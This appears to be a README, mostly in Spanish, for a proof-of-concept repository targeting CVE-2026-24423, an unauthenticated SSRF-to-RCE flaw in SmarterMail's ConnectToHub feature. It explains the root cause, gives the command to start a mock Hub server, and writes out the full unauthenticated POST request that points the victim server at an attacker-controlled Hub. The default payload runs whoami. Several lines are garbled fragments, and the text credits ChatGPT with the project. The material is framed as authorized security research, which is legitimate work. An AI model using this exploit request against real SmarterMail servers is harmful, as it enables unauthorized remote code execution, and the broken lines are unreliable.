
Script de reproducción para CVE-2026-24423, una violación del límite de confianza en SmarterMail ConnectToHub que conduce a SSRF y posible ejecución remota de código. Incluye un servidor Hub simulado e instrucciones para activar la API vulnerable.
# CVE-2026-24423 – Reproducción
> ⚠️ **Solo para investigación de seguridad y pruebas autorizadas / For security research and authorized testing only**
## Introducción (Overview)
Este proyecto se utiliza para reproducir la vulnerabilidad **CVE-2026-24423**.
La vulnerabilidad existe en la función **SmarterMail ConnectToHub**, y su causa raíz es:
- La interfaz de nivel administrativo no requiere autenticación
- El servidor se conecta activamente al Hub especificado por el usuario (SSRF)
- Los datos devueltos por el Hub externo se utilizan directamente para operaciones locales a nivel de sistema
Esta vulnerabilidad es una **violación del límite de confianza a nivel de diseño (Trust Boundary Violation)**, que en última instancia puede conducir a la ejecución remota de código.
Este repositorio se utiliza únicamente para **verificación de vulnerabilidades e investigación técnica**, no para explotación con fines maliciosos.
Start Hub Simulation Server
python3 cve-2026-24423.py
Este script:
SystemMountTrigger the Vulnerable API
Use Yakit o Burp Suite para enviar la solicitud:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json
{
"hubAddress": "http://ip",
"oneTimePassword": "test",
"nodeName": "victim"
}
Esta interfaz no requiere autenticación No authentication is required.
Troubleshooting
Si la reproducción de la vulnerabilidad falla:
MountPath en cve-2026-24423.pyResult
Cuando la vulnerabilidad se activa con éxito, SmarterMail analizará los datos devueltos por el Hub; el código predeterminado solo ejecuta el comando whoami.
Captura de ejemplo / Example:

Este proyecto fue realizado por ChatGPT.